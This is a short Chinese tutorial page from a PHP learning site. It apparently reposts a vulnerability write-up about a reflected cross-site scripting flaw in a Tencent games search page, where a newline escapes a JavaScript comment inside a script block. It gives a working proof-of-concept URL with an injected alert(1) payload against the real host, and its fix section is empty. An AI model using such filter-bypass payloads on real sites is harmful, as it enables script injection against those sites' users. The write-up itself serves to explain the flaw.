来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 还是在script之间的场景,某些情况下,我们仅仅需要的只是一个换行符,就可以绕过过滤了。 它让双引号,尖括号知道了它们不是一个符号在战斗。1.实际场景是下面这个例子。http://...
还是在<script>之间的场景,某些情况下,我们仅仅需要的只是一个换行符,就可以绕过过滤了。 它让双引号,尖括号知道了“它们不是一个符号在战斗”。 http://datalib.games.qq.com/cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=aaaaaaaaaa
//我是注释,我爱洗澡,哦~哦~哦~ [我是输出]
//我是注释,我爱洗澡,哦~哦~哦~ [我是输出 换行符
5. 恩,带着这样一个想法,我们不难构造出以下利用。 http://datalib.games.qq.com/cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=%0aalert(1);//
修复方案: |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com